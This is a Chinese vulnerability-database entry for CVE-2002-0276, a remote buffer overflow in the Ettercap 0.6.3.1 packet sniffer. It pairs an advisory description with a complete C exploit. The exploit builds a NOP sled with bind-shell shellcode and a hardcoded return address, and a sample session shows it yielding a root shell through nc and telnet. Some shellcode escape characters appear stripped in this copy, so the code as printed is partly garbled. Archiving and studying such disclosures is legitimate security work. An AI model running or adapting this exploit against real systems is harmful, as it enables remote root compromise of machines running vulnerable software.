Ettercap大数据包缓冲区溢出漏洞
漏洞ID | 1106614 | 漏洞类型 | 边界条件错误 |
发布时间 | 2002-02-14 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-2002-0276 |
CNNVD-ID | CNNVD-200205-113 |
漏洞平台 | Linux | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
Ettercap是Ettercap团队开发的一套基于Linux和BSD平台的多用途数据包嗅探程序,它支持创建和发送伪造的包、发送从网络适配器到应用软件各种级别的包、绑定监听数据到一个本地端口等。Ettercap在处理大数据包的实现上存在问题,远程攻击者可能利用这个漏洞在运行Ettercap的主机上执行任意指令。当Ettercap收到一个大的数据包并把它提交给解码程序解码时,可能发生缓冲区溢出问题,堆栈中的数据被改写,从而导致执行攻击者注入的任意指令。这种情况可能在Ettercap与一个MTU大于以太网标准值的网络接口相联系时或者Ettercap收到一个有伪造的包长度信息的数据包时发生。Ettercap通常情况下以root身份执行,并且之前版本的Ettercap也有可能受此漏洞的影响。
|漏洞EXP
source: http://www.securityfocus.com/bid/4104/info
Ettercap is a multipurpose packet sniffer for Linux and BSD based systems. It includes support for features such as character injection and packet filtering. Ettercap has been ported to Windows.
A remotely exploitable buffer overflow condition exists in Ettercap. If a large packet is recieved and passed to some decoders, stack data may be overwritten, leading to execution of arbitrary code. This condition may be caused by associating Ettercap with an interface with a larger MTU than ethernet, or by sending a forged packet with a misleading data length field.
Ettercap would normally be executed by the root user. Earlier versions of Ettercap may share this vulnerability.
/*
* ettercap-0.6.3.1 remote root xploit
*
* By: Ferm�n J. Serna <[email protected]>
* Next Generation Security Technologies
* http://www.ngsec.com
*
* DESCRIPTION:
* ============
*
* Several decoders (mysql, irc, ...) suffer the following problem:
*
* memcpy(collector, payload, data_to_ettercap->datalen);
*
* collector is declared as:
*
* u_char collector[MAX_DATA];
*
* where MAX_DATA is:
*
* #define MAX_DATA 2000
*
* So on interfaces where MTU is higher than 2000 you can exploit
* ettercap. Nop, normal ethernets have MTU:1500 ;P
*
* Here are common MTU and interface types:
*
* 65535 Hyperchannel
* 17914 16 Mbit/sec token ring
* 8166 Token Bus (IEEE 802.4)
* 4464 4 Mbit/sec token ring (IEEE 802.5)
* 1500 Ethernet
* 1500 PPP (typical; can vary widely)
*
* Sample explotation could be also in loopback interfaces: MTU:16436
*
* piscis:~# ettercap -NszC -i lo &
* [1] 21887
* piscis:~# ./ettercap-x 0 | nc localhost mysql
* ettercap-0.6.3.1 xploit by Ferm�n J. Serna <[email protected]>
* Next Generation Security Technologies
* http://www.ngsec.com
*
* punt!
* piscis:~# telnet localhost 36864
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* id;
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
*
* Madrid, 5/02/2002
*
*/
#include <stdio.h>
#include <string.h>
#define NUM_ADDR 100
#define NOP 0x41
#define BUFF_SIZE 2200
#define RET_ADDR 0xbfffea58
#define OFFSET 0
char shellcode[]=
"x1bxebx78x5ex29xc0x89x46x10x40x89xc3x89x46x0cx40"
"x89x46x08x8dx4ex08xb0x66xcdx80xebx01x3Cx43xc6x46"
"x10x10x66x89x5ex14x88x46x08x29xc0x89xc2x89x46x18"
"xb0x90x66x89x46x16x8dx4ex14x89x4ex0cx8dx4ex08xb0"
"x66xcdx80x89x5ex0cx43x43xb0x66xcdx80x89x56x0cx89"
"x56x10xb0x66x43xcdx80xebx01x2Dx86xc3xb0x3fx29xc9"
"xcdx80xb0x3fx41xcdx80xb0x3fx41xcdx80x88x56x07x89"
"x76x0cx87xf3x8dx4bx0cxb0x0bxcdx80xe8x83xffxffxff"
"/bin/sh";
int main(int argc, char **argv) {
char buffer[BUFF_SIZE];
char *ch_ptr;
unsigned long *lg_ptr;
int aux;
int offset=OFFSET;
fprintf(stderr,"ettercap-0.6.3.1 xploit by Ferm�n J. Serna <[email protected]>n");
fprintf(stderr,"Next Generation Security Technologiesn");
fprintf(stderr,"http://www.ngsec.comnn");
if (argc==2) offset=atoi(argv[1]);
memset(buffer,0,sizeof(buffer));
ch_ptr=buffer;
memset(ch_ptr,NOP,sizeof(buffer)-strlen(shellcode)-4*NUM_ADDR);
ch_ptr+=sizeof(buffer)-strlen(shellcode)-4*NUM_ADDR;
memcpy(ch_ptr,shellcode,strlen(shellcode));
ch_ptr+=strlen(shellcode);
lg_ptr=(unsigned long *)ch_ptr;
for (aux=0;aux<NUM_ADDR;aux++) *(lg_ptr++)=RET_ADDR+offset;
ch_ptr=(char *)lg_ptr;
*ch_ptr=' ';
printf("%s",buffer);
return(0);
}
|参考资料
来源:BUGTRAQ
名称:20020213[NGSEC-2002-1]Ettercap,remoterootcompromise
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=101370874219511&w;=2
来源:ettercap.sourceforge.net
链接:http://ettercap.sourceforge.net/index.php?s=history
来源:BID
名称:4104
链接:http://www.securityfocus.com/bid/4104
来源:XF
名称:ettercap-memcpy-bo(8200)
链接:http://www.iss.net/security_center/static/8200.php
相关推荐: HP-UX Support Tools Manager Denial of Service Attack
HP-UX Support Tools Manager Denial of Service Attack 漏洞ID 1103523 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2001-01-18 更新…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666